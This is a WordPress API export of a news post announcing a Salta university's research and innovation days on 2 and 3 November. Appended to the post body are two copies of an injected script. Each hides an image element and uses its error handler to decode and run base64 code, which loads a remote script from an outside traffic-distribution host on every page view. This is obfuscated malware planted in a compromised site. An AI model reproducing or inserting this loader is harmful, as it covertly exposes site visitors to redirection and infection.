{"id":1687,"date":"2022-10-27T11:08:50","date_gmt":"2022-10-27T14:08:50","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=1687"},"modified":"2025-08-14T00:32:01","modified_gmt":"2025-08-14T03:32:01","slug":"la-universidad-catolica-invita-a-participar-de-las-jornadas-de-investigacion-desarrollo-e-innovacion","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=1687","title":{"rendered":"La Universidad Cat\u00f3lica invita a participar de las Jornadas de Investigaci\u00f3n, Desarrollo e Innovaci\u00f3n"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#624903\"><em>Los pr\u00f3ximos 2 y 3 de noviembre se llevar\u00e1n a cabo estas jornadas con el objetivo de dar a conocer los proyectos que la Universidad junto a instituciones p\u00fablico privadas se encuentran llevando adelante.<\/em><\/h3>\n\n\n\n<p>La edici\u00f3n N\u00b0 16 de las Jornadas de Investigaci\u00f3n, Desarrollo e Innovaci\u00f3n de la UCASAL se realizar\u00e1 los pr\u00f3ximos 2 y 3 de noviembre en el campus universitario, sito en el barrio Casta\u00f1ares de la capital, a partir de las 9 de la ma\u00f1ana.<\/p>\n\n\n\n<p>Como cada a\u00f1o, esta ser\u00e1 la oportunidad donde la casa de estudios de a conocer los proyectos que se llevan a cabo en el \u00e1mbito de la investigaci\u00f3n, el desarrollo y la innovaci\u00f3n. Cabe destacar que, las presentaciones involucrar\u00e1n a referentes de instituciones p\u00fablicas y privadas con las cuales se han trazado alianzas estrat\u00e9gicas para intervenir en problem\u00e1ticas de diversas \u00edndoles.<\/p>\n\n\n\n<p>En el caso de la jornada del mi\u00e9rcoles 2 de noviembre, el eje troncal de las mismas ser\u00e1 la investigaci\u00f3n cient\u00edfica. La agenda prevista incluye la presencia de investigadores destacados como los doctores Ra\u00fal Becchio (Director del CCT de Salta y Jujuy de Conicet)&nbsp; y Andr\u00e9s Rieznick (doctor en F\u00edsica, divulgador cient\u00edfico, profesor de la<\/p>\n\n\n\n<p>Universidad Torcuato Di Tella y conductor del segmento televisivo \u201cLa Liga de la Ciencia\u201d).<\/p>\n\n\n\n<p>Adem\u00e1s, los asistentes a las jornadas contar\u00e1n con espacios de conferencias e intercambios con los equipos cient\u00edficos que actualmente se encuentran desarrollando proyectos de investigaci\u00f3n.<\/p>\n\n\n\n<p>La segunda jornada, jueves 3 de noviembre, estar\u00e1 dedicada al desarrollo, la innovaci\u00f3n, la vinculaci\u00f3n y transferencia. Este ser\u00e1 el espacio para dar a conocer las iniciativas que se desarrollan con el objetivo de intervenir en problem\u00e1ticas sociales de manera activa y creativa.<\/p>\n\n\n\n<p><a href=\"https:\/\/drive.google.com\/file\/d\/1Af8tZWVY9Vtr2WnDj2VfVUVndmHkv-_i\/view?usp=sharing\" target=\"_blank\" rel=\"noopener\"><strong>Descarga el programa completo<\/strong><\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Los pr\u00f3ximos 2 y 3 de noviembre se llevar\u00e1n a cabo estas jornadas con el objetivo de dar a conocer los proyectos que la Universidad junto a instituciones p\u00fablico privadas se encuentran llevando adelante. La edici\u00f3n N\u00b0 16 de las Jornadas de Investigaci\u00f3n, Desarrollo e Innovaci\u00f3n de la UCASAL se realizar\u00e1 los pr\u00f3ximos 2 y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1688,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-1687","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1687"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1687"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1687\/revisions"}],"predecessor-version":[{"id":7301,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/1687\/revisions\/7301"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/1688"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1687"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1687"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1687"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}